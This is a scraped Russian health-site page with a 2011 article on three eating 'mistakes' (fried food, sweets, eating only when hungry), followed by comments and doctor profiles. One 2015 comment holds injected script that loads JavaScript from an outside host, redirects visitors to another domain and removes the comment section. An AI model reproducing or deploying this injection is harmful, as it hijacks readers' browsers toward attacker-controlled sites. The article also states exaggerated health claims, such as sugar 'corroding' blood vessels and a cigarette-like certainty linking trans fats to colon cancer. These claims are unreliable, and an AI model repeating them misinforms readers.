Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 ошибки в еде, которые в...  >>  3 ошибки в еде, которые вас убивают
 
Обратная связь
 

3 ошибки в еде, которые вас убивают

Размер шрифта
28 ноября 2011 08:15
  • google_analytics: false
  • Нравится

Жареное провоцирует рак, сладкое разрушает сосуды, голод приводит к ожирению. Как правильно питаться, чтобы сохранить здоровье?

Ошибка 1: Есть жареное

В чем опасность жареной пищи?

  • Акриламид. Этот канцероген образуется при температуре выше 200 градусов, когда масло на сковороде закипает. По данным ученых, у женщин, которые любят жареное, рак груди встречается в 2 раза чаще, чем у тех, кто готовит на пару или в духовке.
  • Транс-жиры. Весь фастфуд, вся выпечка и жареная пища содержат транс-жиры, твердые жиры, которые получают из растительных масел. Транс-жиры приводят к раку желудка и раку толстой кишки. Люди, употребляющие большое количество продуктов с транс-жирами, на 86% больше остальных рискуют заболеть раком толстой кишки. Учитывая тот факт, что рак толстой кишки входит в тройку самых распространенных видов рака, связь между транс-жирами и раком толстой кишки так же очевидна, как и связь между сигаретой и раком легких.

Что делать?

  • Отказаться от жареного. Варить или готовить на пару.
  • Если вы не можете отказаться от жареного, проветривайте кухню, чтобы не вдыхать канцерогены во время приготовления еды.

Ошибка 2: Есть сладости

  • Сахар буквально «разъедает» стенки кровеносных сосудов. Сосуды истончаются, становятся ломкими. Это увеличивает риск инсульта и инфаркта миокарда.
  • Сахар разрушает коллаген. Это белок, который делает кожу упругой и эластичной. Если в организме сахара слишком много, нити коллагена становятся хрупкими, кожа портится, появляются морщины. 

Что делать?

  • Отказаться от сахара, заменить сладости фруктами.
  • Покупать продукты, богатые витаминами С и А: все оранжевые фрукты, клубнику, шиповник, зеленый лук.
  • Есть продукты с аргинином. Эта аминокислота увеличивает синтез коллагена. Аргинин есть в сое, молочных продуктах, грецких орехах.

Ошибка 3: Садиться за стол, только если чувствуется голод

За чувство голода отвечает гормон грелин. Он вырабатывается в желудке. Если желудок пустой, грелин сообщает мозгу о том, что пора есть. Попав в желудок, еда воздействует на рецепторы, и грелин не вырабатывается. Аппетит пропадает.

Если вовремя не пообедать, уровень грелина резко возрастает, в мозг постоянно поступают сигналы о голоде. «Дорвавшись» до еды, голодный человек съедает огромную порцию, а излишки сахара и жира тут же откладываются в нежелательных местах.

Что делать?

  • Ешьте маленькими порциями в течение всего дня. Рецепторы в желудке будут блокировать секрецию грелина.
  • Готовьте еду дома и приносите на работу в контейнерах. 

Видеосюжеты по теме:

3 ошибки в еде. Что есть и как есть

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.